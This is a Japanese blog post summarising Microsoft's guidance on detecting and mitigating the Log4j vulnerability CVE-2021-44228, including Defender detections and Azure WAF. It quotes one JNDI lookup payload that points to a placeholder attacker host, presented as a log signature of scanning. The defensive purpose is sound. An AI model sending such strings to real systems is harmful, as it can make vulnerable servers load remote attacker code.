Log4j の問題についてセキュリティブログが公開されています

この年末年始の休みに docs を眺めていたら、 Log4j  の問題が最上部のヘッダーに表示されるようになっていました。

この内容はなかなか難しかったのでかいつまんで意識しておきたいところを確認しておきたいと思います。

f:id:mohessu:20211231013003p:plain

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?WT.mc_id=M365-MVP-5002496

この内容の概要としては、マイクロソフトがウォッチしている Log4j 関連の問題に関する解析状況を伝えていました。

この問題に対する Web アクセスの大半は以下のタイプのログで判断できるようです。

${jndi:ldap://[attacker site]/a}

ログからこのような内容が見受けられた場合はスキャンされているということですね。

また、ランサムウェア攻撃の増加は見られていないものの、ランサムウェアにつながるブローカーのネットワークからのスキャンが見られているとのこと。

今後ランサムウェアへの感染拡大が懸念されますね。

また、マイクロソフト製品での防御に関する情報も記載されています。

Microsoft Endpoint Defender をはじめ、無償のものから有償のものまでどういった検出が行われるのか記載されています。

f:id:mohessu:20220101003317p:plain

Microsoft 365 E5 などを活用している場合脅威と脆弱性の管理が使えるので、以下のアドレスから Log4j 関連の情報を確認するダッシュボードも展開されています。

https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview

この問題が発覚してからまだ日が浅いこともあり、実際の対応はこれからということも多いかと思います。

Azure の WAF プレミアムなどでも一時対処ができるので対応方法の検討を進めておきましょう。

音楽:地球共鳴